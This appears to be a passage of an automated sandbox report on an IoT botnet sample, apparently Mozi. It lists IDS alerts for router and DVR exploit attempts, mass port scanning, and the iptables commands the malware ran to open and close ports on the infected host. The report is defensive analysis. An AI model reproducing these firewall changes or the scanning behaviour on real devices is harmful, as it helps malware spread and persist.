Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:44576 -> 154.210.25.254:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:54110 -> 114.34.159.229:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:54110 -> 114.34.159.229:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 222.50.122.98: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:50886 -> 154.3.84.96:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:49172 -> 59.151.23.11:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:49172 -> 59.151.23.11:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 2.206.33.227: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 185.229.189.17: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:52244 -> 89.129.183.215:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:52244 -> 89.129.183.215:80
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 213.163.117.122:8082 -> 192.168.2.20:8080
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:56522 -> 83.151.238.20:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:56522 -> 83.151.238.20:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 81.173.160.123: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:60358 -> 166.88.13.234:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.75.23.254: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:36846 -> 188.106.17.156:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:36846 -> 188.106.17.156:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 134.106.144.216: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.109.232.198: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:49468 -> 104.94.83.241:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:49468 -> 104.94.83.241:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:47256 -> 204.232.228.51:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.94.83.241:80 -> 192.168.2.20:49468
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:36234 -> 104.24.17.66:8080
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:36234 -> 104.24.17.66:8080
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:52176 -> 194.76.32.64:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:52176 -> 194.76.32.64:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:56082 -> 154.92.39.203:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:56082 -> 154.92.39.203:80
Source: Traffic	Snort IDS: 2024915 ET EXPLOIT Possible Vacron NVR Remote Command Execution 192.168.2.20:41890 -> 118.48.130.177:8080
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:33196 -> 185.36.171.129:80

Connects to many ports of the same IP (likely port scanning)

Source: global traffic	TCP traffic: 19.35.22.33 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 69.153.253.195 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 215.110.247.154 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 7.133.161.69 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 48.57.169.235 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 57.50.30.157 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 69.107.161.237 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 84.183.159.213 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 54.39.218.76 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 37.127.116.2 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 27.46.25.163 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 183.30.162.72 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 12.121.21.175 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 151.160.250.99 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 72.240.24.193 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 112.36.7.254 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 200.160.26.61 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 49.240.54.114 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 8.191.54.125 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 54.72.49.99 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 102.247.160.88 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 91.192.83.22 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 3.31.11.51 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 21.71.60.36 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 188.61.141.250 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 141.215.180.231 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 137.225.108.177 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 146.5.176.64 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 160.189.168.11 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 89.192.178.91 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 91.193.93.252 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 220.112.131.158 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 146.31.191.38 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 175.79.49.111 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 189.16.44.51 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 184.225.49.232 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 137.142.227.113 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 211.130.169.58 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 108.58.115.194 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 85.4.13.35 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 45.71.81.134 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 215.122.80.92 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 116.26.35.18 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 15.81.245.80 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 72.204.193.69 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 33.33.197.233 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 11.0.46.244 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 81.185.164.190 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 47.167.153.49 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 222.36.210.127 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 198.26.185.1 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 5.144.31.210 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 97.149.39.21 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 66.156.43.17 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 46.138.124.14 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 119.17.3.130 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 54.194.243.156 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 62.237.39.27 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 35.197.143.134 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 117.0.115.227 ports 2,5,6,8,9,52869

Executes the "iptables" command to insert, remove and/or manipulate rules

Source: /bin/sh (PID: 4638)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4672)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4679)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4720)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4732)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4755)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4763)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4785)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4815)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4819)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4838)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4866)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4896)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4915)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4939)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4966)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4986)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4992)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5015)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5042)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5063)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5071)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5095)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5119)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5139)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5158)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5167)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5194)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5215)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5229)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5253)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5265)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8080 -j ACCEPT	Jump to behavior

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 52478 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 53350 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 54390 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 49152 -> 54390

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.20:50800 -> 173.128.113.111:7574
Source: global traffic	TCP traffic: 192.168.2.20:52994 -> 151.70.88.212:5555
Source: global traffic	TCP traffic: 192.168.2.20:40582 -> 37.127.116.2:52869
Source: global traffic	TCP traffic: 192.168.2.20:49692 -> 73.213.225.252:8443
Source: global traffic	TCP traffic: 192.168.2.20:44244 -> 164.95.80.124:8443
Source: global traffic	TCP traffic: 192.168.2.20:43214 -> 65.119.165.128:7574
Source: global traffic	TCP traffic: 192.168.2.20:41268 -> 112.60.138.223:7574
Source: global traffic	TCP traffic: 192.168.2.20:49422 -> 54.72.49.99:52869
Source: global traffic	TCP traffic: 192.168.2.20:43636 -> 159.134.45.88:8443
Source: global traffic	TCP traffic: 192.168.2.20:40086 -> 169.108.151.225:8443
Source: global traffic	TCP traffic: 192.168.2.20:58250 -> 46.69.243.160:81
Source: global traffic	TCP traffic: 192.168.2.20:50540 -> 45.71.81.134:37215
Source: global traffic	TCP traffic: 192.168.2.20:42756 -> 187.65.235.163:8080
Source: global traffic	TCP traffic: 192.168.2.20:47538 -> 133.182.208.68:8443
Source: global traffic	TCP traffic: 192.168.2.20:59888 -> 65.169.70.71:5555
Source: global traffic	TCP traffic: 192.168.2.20:52378 -> 96.200.64.71:7574
Source: global traffic	TCP traffic: 192.168.2.20:53936 -> 99.231.44.225:8080
Source: global traffic	TCP traffic: 192.168.2.20:40382 -> 88.83.215.123:5555
Source: global traffic	TCP traffic: 192.168.2.20:60188 -> 112.188.233.56:7574
Source: global traffic	TCP traffic: 192.168.2.20:33888 -> 177.228.76.105:5555
Source: global traffic	TCP traffic: 192.168.2.20:38378 -> 196.250.243.57:8080
Source: global traffic	TCP traffic: 192.168.2.20:60388 -> 151.160.250.99:37215
Source: global traffic	TCP traffic: 192.168.2.20:36256 -> 141.215.180.231:52869
Source: global traffic	TCP traffic: 192.168.2.20:52424 -> 53.12.181.226:7574
Source: global traffic	TCP traffic: 192.168.2.20:35830 -> 72.240.24.193:52869
Source: global traffic	TCP traffic: 192.168.2.20:48832 -> 168.237.187.123:5555
Source: global traffic	TCP traffic: 192.168.2.20:58328 -> 60.222.236.176:8080
Source: global traffic	TCP traffic: 192.168.2.20:57698 -> 45.220.233.11:8080
Source: global traffic	TCP traffic: 192.168.2.20:39368 -> 188.61.141.250:49152
Source: global traffic	TCP traffic: 192.168.2.20:53682 -> 189.51.61.124:5555
Source: global traffic	TCP traffic: 192.168.2.20:53168 -> 82.32.209.151:8443
Source: global traffic	TCP traffic: 192.168.2.20:53620 -> 54.139.218.167:5555
Source: global traffic	TCP traffic: 192.168.2.20:39316 -> 54.194.243.156:49152
Source: global traffic	TCP traffic: 192.168.2.20:33798 -> 161.170.180.99:81
Source: global traffic	TCP traffic: 192.168.2.20:54032 -> 219.190.141.219:8080
Source: global traffic	TCP traffic: 192.168.2.20:45228 -> 102.247.160.88:52869
Source: global traffic	TCP traffic: 192.168.2.20:57020 -> 178.236.3.160:8443
Source: global traffic	TCP traffic: 192.168.2.20:44548 -> 42.112.107.113:81
Source: global traffic	TCP traffic: 192.168.2.20:52310 -> 214.58.190.175:8080
Source: global traffic	TCP traffic: 192.168.2.20:59932 -> 15.81.245.80:37215
Source: global traffic	TCP traffic: 192.168.2.20:60906 -> 3.31.11.51:52869
Source: global traffic	TCP traffic: 192.168.2.20:38286 -> 8.231.233.201:8080
Source: global traffic	TCP traffic: 192.168.2.20:50754 -> 161.95.111.90:8080
Source: global traffic	TCP traffic: 192.168.2.20:49450 -> 115.251.170.50:8443
Source: global traffic	TCP traffic: 192.168.2.20:40136 -> 21.210.48.60:5555
Source: global traffic	TCP traffic: 192.168.2.20:37408 -> 19.228.27.33:8080
Source: global traffic	TCP traffic: 192.168.2.20:59548 -> 198.75.210.198:7574
Source: global traffic	TCP traffic: 192.168.2.20:57734 -> 157.111.93.206:5555
Source: global traffic	TCP traffic: 192.168.2.20:53854 -> 8.191.54.125:37215
Source: global traffic	TCP traffic: 192.168.2.20:36222 -> 83.169.154.146:8443
Source: global traffic	TCP traffic: 192.168.2.20:40470 -> 28.20.175.209:81
Source: global traffic	TCP traffic: 192.168.2.20:54056 -> 11.0.46.244:49152
Source: global traffic	TCP traffic: 192.168.2.20:50054 -> 46.138.124.14:49152
Source: global traffic	TCP traffic: 192.168.2.20:55876 -> 48.57.169.235:37215
Source: global traffic	TCP traffic: 192.168.2.20:38722 -> 188.76.169.197:8080
Source: global traffic	TCP traffic: 192.168.2.20:51776 -> 54.214.12.70:5555
Source: global traffic	TCP traffic: 192.168.2.20:40314 -> 222.36.210.127:37215
Source: global traffic	TCP traffic: 192.168.2.20:59114 -> 202.164.221.195:49152
Source: global traffic	TCP traffic: 192.168.2.20:50036 -> 119.17.3.130:49152
Source: global traffic	TCP traffic: 192.168.2.20:57186 -> 215.110.247.154:52869
Source: global traffic	TCP traffic: 192.168.2.20:57952 -> 118.183.105.53:8443
Source: global traffic	TCP traffic: 192.168.2.20:33232 -> 27.46.25.163:52869
Source: global traffic	TCP traffic: 192.168.2.20:36872 -> 62.237.39.27:49152
Source: global traffic	TCP traffic: 192.168.2.20:60776 -> 174.11.178.210:5555
Source: global traffic	TCP traffic: 192.168.2.20:38918 -> 164.156.119.109:8080
Source: global traffic	TCP traffic: 192.168.2.20:56754 -> 185.95.199.80:8080
Source: global traffic	TCP traffic: 192.168.2.20:42484 -> 88.64.5.249:8080
Source: global traffic	TCP traffic: 192.168.2.20:59846 -> 202.171.192.205:7574
Source: global traffic	TCP traffic: 192.168.2.20:58760 -> 194.243.234.78:8080
Source: global traffic	TCP traffic: 192.168.2.20:46986 -> 76.5.175.91:7574
Source: global traffic	TCP traffic: 192.168.2.20:52502 -> 160.189.168.11:37215
Source: global traffic	TCP traffic: 192.168.2.20:60458 -> 184.133.154.232:8080
Source: global traffic	TCP traffic: 192.168.2.20:43954 -> 46.110.225.126:8080
Source: global traffic	TCP traffic: 192.168.2.20:34068 -> 122.76.30.28:8080
Source: global traffic	TCP traffic: 192.168.2.20:50900 -> 146.5.176.64:49152
Source: global traffic	TCP traffic: 192.168.2.20:47640 -> 137.225.108.177:49152
Source: global traffic	TCP traffic: 192.168.2.20:37910 -> 162.72.144.200:8443
Source: global traffic	TCP traffic: 192.168.2.20:44098 -> 14.137.108.35:8080
Source: global traffic	TCP traffic: 192.168.2.20:55294 -> 103.208.59.35:8080
Source: global traffic	TCP traffic: 192.168.2.20:49854 -> 175.79.49.111:52869
Source: global traffic	TCP traffic: 192.168.2.20:51114 -> 184.195.78.194:5555
Source: global traffic	TCP traffic: 192.168.2.20:50090 -> 195.254.187.23:8080
Source: global traffic	TCP traffic: 192.168.2.20:39760 -> 62.217.214.44:8080
Source: global traffic	TCP traffic: 192.168.2.20:51876 -> 198.26.185.1:49152
Source: global traffic	TCP traffic: 192.168.2.20:44500 -> 90.59.150.212:5555
Source: global traffic	TCP traffic: 192.168.2.20:40216 -> 57.50.30.157:49152
Source: global traffic	TCP traffic: 192.168.2.20:56508 -> 196.8.192.224:8080
Source: global traffic	TCP traffic: 192.168.2.20:43366 -> 85.122.252.148:8443
Source: global traffic	TCP traffic: 192.168.2.20:43488 -> 137.142.227.113:37215
Source: global traffic	TCP traffic: 192.168.2.20:33858 -> 220.186.175.16:5555
Source: global traffic	TCP traffic: 192.168.2.20:48744 -> 11.151.211.21:8443
Source: global traffic	TCP traffic: 192.168.2.20:35056 -> 99.22.46.253:81
Source: global traffic	TCP traffic: 192.168.2.20:51026 -> 194.63.219.69:81
Source: global traffic	TCP traffic: 192.168.2.20:41328 -> 22.104.172.87:8080
Source: global traffic	TCP traffic: 192.168.2.20:37098 -> 125.45.4.232:7574
Source: global traffic	TCP traffic: 192.168.2.20:57546 -> 84.183.159.213:37215
Source: global traffic	TCP traffic: 192.168.2.20:45660 -> 77.125.39.19:7574
Source: global traffic	TCP traffic: 192.168.2.20:39476 -> 81.227.254.8:8080
Source: global traffic	TCP traffic: 192.168.2.20:58714 -> 186.124.130.151:8443
Source: global traffic	TCP traffic: 192.168.2.20:44310 -> 135.13.251.193:8443
Source: global traffic	TCP traffic: 192.168.2.20:58216 -> 49.240.54.114:49152
Source: global traffic	TCP traffic: 192.168.2.20:55714 -> 97.149.39.21:52869
Source: global traffic	TCP traffic: 192.168.2.20:44856 -> 145.201.199.95:8080
Source: global traffic	TCP traffic: 192.168.2.20:54518 -> 145.243.250.38:8080
Source: global traffic	TCP traffic: 192.168.2.20:46072 -> 53.140.123.217:8443
Source: global traffic	TCP traffic: 192.168.2.20:53028 -> 46.29.166.221:8080
Source: global traffic	TCP traffic: 192.168.2.20:44150 -> 96.117.90.192:8080
Source: global traffic	TCP traffic: 192.168.2.20:47674 -> 44.173.210.161:8080
Source: global traffic	TCP traffic: 192.168.2.20:44056 -> 131.108.171.195:5555
Source: global traffic	TCP traffic: 192.168.2.20:47758 -> 7.133.161.69:37215
Source: global traffic	TCP traffic: 192.168.2.20:60334 -> 209.224.95.250:8443
Source: global traffic	TCP traffic: 192.168.2.20:40270 -> 63.27.192.49:8080
Source: global traffic	TCP traffic: 192.168.2.20:46282 -> 112.36.7.254:37215
Source: global traffic	TCP traffic: 192.168.2.20:36712 -> 35.42.181.95:8443
Source: global traffic	TCP traffic: 192.168.2.20:37028 -> 85.34.73.210:5555
Source: global traffic	TCP traffic: 192.168.2.20:36212 -> 205.214.189.164:8443
Source: global traffic	TCP traffic: 192.168.2.20:57058 -> 69.153.253.195:49152
Source: global traffic	TCP traffic: 192.168.2.20:46398 -> 54.39.218.76:37215
Source: global traffic	TCP traffic: 192.168.2.20:42590 -> 199.22.238.78:8080
Source: global traffic	TCP traffic: 192.168.2.20:50434 -> 183.247.34.112:81
Source: global traffic	TCP traffic: 192.168.2.20:33194 -> 26.17.1.11:8080
Source: global traffic	TCP traffic: 192.168.2.20:38044 -> 91.193.93.252:52869
Source: global traffic	TCP traffic: 192.168.2.20:59878 -> 47.167.153.49:52869
Source: global traffic	TCP traffic: 192.168.2.20:53416 -> 37.157.134.82:8080
Source: global traffic	TCP traffic: 192.168.2.20:59302 -> 65.218.226.124:7574
Source: global traffic	TCP traffic: 192.168.2.20:39006 -> 133.225.142.204:8443
Source: global traffic	TCP traffic: 192.168.2.20:45766 -> 33.33.197.233:52869
Source: global traffic	TCP traffic: 192.168.2.20:56848 -> 57.2.217.0:5555
Source: global traffic	TCP traffic: 192.168.2.20:36556 -> 114.208.194.52:8080
Source: global traffic	TCP traffic: 192.168.2.20:47474 -> 168.155.124.28:81
Source: global traffic	TCP traffic: 192.168.2.20:44738 -> 200.70.157.247:8080
Source: global traffic	TCP traffic: 192.168.2.20:52742 -> 18.22.126.190:8443
Source: global traffic	TCP traffic: 192.168.2.20:33038 -> 162.168.17.49:7574
Source: global traffic	TCP traffic: 192.168.2.20:36808 -> 116.26.35.18:52869
Source: global traffic	TCP traffic: 192.168.2.20:41998 -> 19.224.127.237:8080
Source: global traffic	TCP traffic: 192.168.2.20:33120 -> 33.247.46.190:8080
Source: global traffic	TCP traffic: 192.168.2.20:57164 -> 19.94.113.230:8080
Source: global traffic	TCP traffic: 192.168.2.20:58236 -> 66.156.43.17:52869
Source: global traffic	TCP traffic: 192.168.2.20:38722 -> 5.144.31.210:37215
Source: global traffic	TCP traffic: 192.168.2.20:33704 -> 65.59.81.254:8443
Source: global traffic	TCP traffic: 192.168.2.20:45044 -> 111.147.154.242:8080
Source: global traffic	TCP traffic: 192.168.2.20:58678 -> 42.247.127.116:8443
Source: global traffic	TCP traffic: 192.168.2.20:35152 -> 13.143.231.12:8080
Source: global traffic	TCP traffic: 192.168.2.20:57278 -> 18.196.100.83:8080
Source: global traffic	TCP traffic: 192.168.2.20:54076 -> 144.171.238.211:81
Source: global traffic	TCP traffic: 192.168.2.20:51050 -> 18.149.58.148:8080
Source: global traffic	TCP traffic: 192.168.2.20:38730 -> 122.139.195.181:8080
Source: global traffic	TCP traffic: 192.168.2.20:54690 -> 184.225.49.232:52869
Source: global traffic	TCP traffic: 192.168.2.20:55844 -> 19.35.22.33:52869
Source: global traffic	TCP traffic: 192.168.2.20:40502 -> 210.120.216.194:8080
Source: global traffic	TCP traffic: 192.168.2.20:39164 -> 31.69.24.163:81
Source: global traffic	TCP traffic: 192.168.2.20:44118 -> 189.16.44.51:37215
Source: global traffic	TCP traffic: 192.168.2.20:33812 -> 35.197.143.134:49152
Source: global traffic	TCP traffic: 192.168.2.20:48974 -> 69.107.161.237:37215
Source: global traffic	TCP traffic: 192.168.2.20:59348 -> 67.97.143.243:8443
Source: global traffic	TCP traffic: 192.168.2.20:59968 -> 59.141.161.142:8080
Source: global traffic	TCP traffic: 192.168.2.20:36518 -> 160.161.138.92:8443
Source: global traffic	TCP traffic: 192.168.2.20:43408 -> 185.169.150.24:8080
Source: global traffic	TCP traffic: 192.168.2.20:59912 -> 195.8.49.55:81
Source: global traffic	TCP traffic: 192.168.2.20:48298 -> 186.144.158.222:7574
Source: global traffic	TCP traffic: 192.168.2.20:59652 -> 215.122.80.92:49152
Source: global traffic	TCP traffic: 192.168.2.20:33622 -> 183.30.162.72:52869
Source: global traffic	TCP traffic: 192.168.2.20:42074 -> 208.77.218.190:8080
Source: global traffic	TCP traffic: 192.168.2.20:58454 -> 19.110.225.46:8080
Source: global traffic	TCP traffic: 192.168.2.20:35942 -> 91.192.83.22:37215
Source: global traffic	TCP traffic: 192.168.2.20:48822 -> 146.31.191.38:49152
Source: global traffic	TCP traffic: 192.168.2.20:58146 -> 81.192.248.54:8080
Source: global traffic	TCP traffic: 192.168.2.20:42694 -> 220.112.131.158:49152
Source: global traffic	TCP traffic: 192.168.2.20:54502 -> 12.121.21.175:49152
